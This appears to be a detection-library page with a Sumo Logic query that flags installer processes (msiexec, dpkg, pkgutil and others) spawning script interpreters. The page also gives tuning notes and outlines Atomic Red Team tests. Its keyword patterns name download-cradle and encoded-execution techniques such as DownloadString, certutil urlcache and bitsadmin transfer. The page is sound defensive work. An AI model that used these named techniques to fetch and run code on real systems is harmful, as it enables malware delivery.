Detect Installer Packages in Sumo Logic CSE
Adversaries may establish persistence and elevate privileges by using an installer package to execute malicious content. Installer packages are setup utilities for applications bundled with an installer utility and can be distributed through legitimate channels. Malicious code can be embedded within installer packages to create backdoors and establish persistence. Installer utilities such as msiexec.exe (Windows MSI), macOS pkgutil, and Linux dpkg/rpm allow adversaries to run pre-install and post-install scripts. These scripts can execute arbitrary code with elevated privileges during the installation process. Additionally, malicious code within the installer can establish persistence by deploying backdoors as scheduled tasks, services, or startup items.
MITRE ATT&CK
- Tactic
- Privilege Escalation Persistence
- Technique
- T1546 Event Triggered Execution
- Sub-technique
- T1546.016 Installer Packages
- Canonical reference
- https://attack.mitre.org/techniques/T1546/016/
Sumo Detection Query
(_sourceCategory=*windows* OR _sourceCategory=*sysmon* OR _sourceCategory=*linux* OR _sourceCategory=*macos*)
| parse regex "(?:ParentImage|ParentProcessName|ParentProcessPath)=(?P<ParentProcess>[^\n\r]+)" nodrop
| parse regex "(?:Image|NewProcessName|ProcessPath|CommandPath)=(?P<ChildProcess>[^\n\r]+)" nodrop
| parse regex "(?:CommandLine|NewProcessCommandLine|ProcessCommandLine)=(?P<CommandLine>[^\n\r]+)" nodrop
| where (
matches(toLowerCase(ParentProcess), "*(msiexec*|*installer*|*pkgutil*|*dpkg*|*rpm*|*yum*|*apt*|*chocolatey*|*winget*)")
AND (
matches(toLowerCase(ChildProcess), "*(powershell*|*pwsh*|*cmd.exe*|*wscript*|*cscript*|*mshta*|*certutil*|*bitsadmin*|*bash*|*python*)")
OR matches(toLowerCase(CommandLine), "*(invoke-webrequest*|*downloadstring*|*net.webclient*|*-encodedcommand*|*certutil*urlcache*|*bitsadmin*transfer*)")
)
)
| eval DetectionType = if(
matches(toLowerCase(CommandLine), "*(invoke-webrequest*|*downloadstring*|*net.webclient*)") AND matches(toLowerCase(ChildProcess), "*(powershell*|*cmd*|*bash*)"),
"INSTALLER_DOWNLOAD_CRADLE",
if(
matches(toLowerCase(CommandLine), "*(-encodedcommand*|*certutil*urlcache*|*bitsadmin*transfer*)"),
"INSTALLER_ENCODED_EXECUTION",
if(
matches(toLowerCase(ChildProcess), "*(powershell*|*pwsh*|*cmd.exe*|*wscript*|*cscript*|*bash*|*python*)"),
"INSTALLER_SCRIPT_CHILD",
"INSTALLER_SUSPICIOUS_ACTIVITY"
)
)
)
| fields _messageTime, _sourceHost, EventID, DetectionType, ChildProcess, CommandLine, ParentProcess
| sort by _messageTime descSumo Logic query parsing Sysmon, Windows Security Event Log, Linux auditd, and macOS Unified Log sources to detect installer parent processes spawning script interpreters or executing download cradle commands. Uses regex field extraction to normalize cross-platform process telemetry and classify events by attack pattern.
Data Sources
Required Tables
False Positives & Tuning
- Software vendors embedding PowerShell or shell scripts in MSI/pkg post-install phases for legitimate product configuration — for example, antivirus kernel extension registration or IDE plugin setup
- Linux dpkg and rpm maintainer scripts (postinst, preinst, postrm) executing bash commands as a standard part of package management, particularly for system packages that modify init scripts or cron entries
- macOS .pkg installers running post-install shell scripts to move application bundles, create symlinks in /usr/local/bin, or write launch daemon plists as part of normal app setup
Other platforms for T1546.016
Testing Methodology
Validate this detection against 3 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.
- Test 1MSI Custom Action Spawning PowerShell
Expected signal: Process creation for msiexec.exe. Subsequent process creation for powershell.exe. The parent-child relationship (msiexec -> powershell) combined with the powershell command line arguments is the detection trigger.
- Test 2Package Manager Post-Install Script with Network Call
Expected signal: Process creation for pip install. Child process for python executing setup.py post-install hook. Child process for curl with the callback URL. The pip->python->curl chain is the detection signal.
- Test 3MSI Silent Installation with Custom Action Tracking
Expected signal: Process creation for msiexec.exe or cmd.exe spawned from installer context. File creation for custom_action_test.txt. Windows Installer Application event log entries for custom action execution.
References (5)
- https://attack.mitre.org/techniques/T1546/016/
- https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.016/T1546.016.md
- https://docs.microsoft.com/en-us/windows/win32/msi/custom-actions
- https://arstechnica.com/information-technology/2022/01/researchers-find-hundreds-of-compromised-npm-packages-stealing-data/
- https://unit42.paloaltonetworks.com/atoms/supply-chain-compromise/
Unlock Pro Content
Get the full detection package for T1546.016 including response playbook, investigation guide, and atomic red team tests.